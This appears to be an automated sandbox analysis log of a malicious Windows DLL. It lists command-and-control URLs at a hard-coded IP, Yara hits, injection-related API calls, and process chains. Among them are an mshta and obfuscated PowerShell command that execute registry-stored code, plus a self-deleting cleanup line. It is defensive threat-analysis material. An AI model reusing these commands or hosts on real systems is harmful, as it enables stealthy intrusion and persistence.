Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: rundll32.exe, 00000002.00000003.503035045.0000000001194000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/ |
Source: rundll32.exe, 00000002.00000003.503035045.0000000001194000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/B3tD71yvfFj/gfZp3daO_2Bdwd/J74GroU_2B2RS9pZPOWRu/OtFR_2FhyZw56X2R/PjMrptj |
Source: rundll32.exe, 00000002.00000003.503022138.000000000118B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.606588477.0000000001194000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.606526811.000000000113A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.503035045.0000000001194000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.492709064.00000000011A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/krFJFZapp/FeVooZCa3X9CgEv8xl0O/YLbv5AhiuWs5MGksInl/tBlU_2FxtzsdfsZwM6Ovod |
Source: rundll32.exe, 00000002.00000003.503035045.0000000001194000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/pL2S3mauJ/ftl9U086Yr5R_2BGOnva/jFSqVT1ErZkBfCX_2Fg/X5AWXLtBUgBo0HiM1ZmG01 |
Source: rundll32.exe, 00000002.00000002.606588477.0000000001194000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.503035045.0000000001194000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://config.edge.skype.com/drew/jS |
Source: rundll32.exe, 00000002.00000003.503071056.0000000001154000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://config.edge.skype.com/drew/jSHM55MKJhVL_2BHAyxcP/Jq1LxH_2Bt7VbS8X/_2Bz3Ktvivj9BLw/s1V_2FEw_2F |
Source: rundll32.exe, 00000002.00000003.547761238.0000000006408000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000003.552317810.0000028CEBFCC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000002.00000003.547761238.0000000006408000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000003.552317810.0000028CEBFCC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: rundll32.exe, 00000002.00000003.547761238.0000000006408000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000003.552317810.0000028CEBFCC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: Yara match |
File source: 00000010.00000003.552317810.0000028CEBFCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.492785568.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493726041.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447927733.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447664966.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447769257.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447430231.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447831794.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.547761238.0000000006408000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447277784.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.494462158.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447956123.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447713846.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 3464, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.12d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.493664049.0000000005589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.606847776.000000000528F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.607520760.0000000005E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493600674.000000000550A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.605996346.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000003.552317810.0000028CEBFCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.492785568.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493726041.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447927733.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447664966.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447769257.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447430231.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447831794.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.547761238.0000000006408000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447277784.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.494462158.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447956123.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447713846.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 3464, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.12d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.493664049.0000000005589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.606847776.000000000528F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.607520760.0000000005E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493600674.000000000550A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.605996346.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_012D4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
2_2_012D4321 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_012D190C GetProcAddress,NtCreateSection,memset, |
2_2_012D190C |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_012D6D0A NtMapViewOfSection, |
2_2_012D6D0A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_012D84C1 NtQueryVirtualMemory, |
2_2_012D84C1 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E374AE NtQueryInformationProcess, |
2_2_05E374AE |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E3C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
2_2_05E3C431 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E40782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
2_2_05E40782 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E461AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
2_2_05E461AE |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E400DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
2_2_05E400DC |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E4A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
2_2_05E4A806 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E42331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
2_2_05E42331 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E364C4 memset,NtQueryInformationProcess, |
2_2_05E364C4 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E3B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
2_2_05E3B7D5 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E3D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
2_2_05E3D77A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E336BB NtGetContextThread,RtlNtStatusToDosError, |
2_2_05E336BB |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E47950 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
2_2_05E47950 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E310C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
2_2_05E310C7 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E43829 NtQuerySystemInformation,RtlNtStatusToDosError, |
2_2_05E43829 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E45312 NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError, |
2_2_05E45312 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E4EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
2_2_05E4EAC5 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05E45220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
2_2_05E45220 |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\GlJdt15gDI.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GlJdt15gDI.dll",#1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GlJdt15gDI.dll",#1 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>P61v='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(P61v).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name unyyrx -value gp; new-alias -name swnnrcsb -value iex; swnnrcsb ([System.Text.Encoding]::ASCII.GetString((unyyrx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1twaywxt\1twaywxt.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES52DC.tmp" "c:\Users\user\AppData\Local\Temp\1twaywxt\CSC8E4C4A27E0F846069DE582614FAC5C1.TMP" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sch0uqly\sch0uqly.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES678D.tmp" "c:\Users\user\AppData\Local\Temp\sch0uqly\CSC67FDFB6A3EC42CBB7751570EDFD46.TMP" |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\System32\control.exe |
Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\GlJdt15gDI.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GlJdt15gDI.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GlJdt15gDI.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name unyyrx -value gp; new-alias -name swnnrcsb -value iex; swnnrcsb ([System.Text.Encoding]::ASCII.GetString((unyyrx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1twaywxt\1twaywxt.cmdline |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sch0uqly\sch0uqly.cmdline |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES52DC.tmp" "c:\Users\user\AppData\Local\Temp\1twaywxt\CSC8E4C4A27E0F846069DE582614FAC5C1.TMP" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES678D.tmp" "c:\Users\user\AppData\Local\Temp\sch0uqly\CSC67FDFB6A3EC42CBB7751570EDFD46.TMP" |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\GlJdt15gDI.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Jump to behavior |
Source: Yara match |
File source: 00000010.00000003.552317810.0000028CEBFCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.492785568.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493726041.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447927733.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447664966.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447769257.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447430231.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447831794.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.547761238.0000000006408000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447277784.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.494462158.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447956123.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447713846.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 3464, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.12d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.493664049.0000000005589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.606847776.000000000528F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.607520760.0000000005E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493600674.000000000550A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.605996346.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
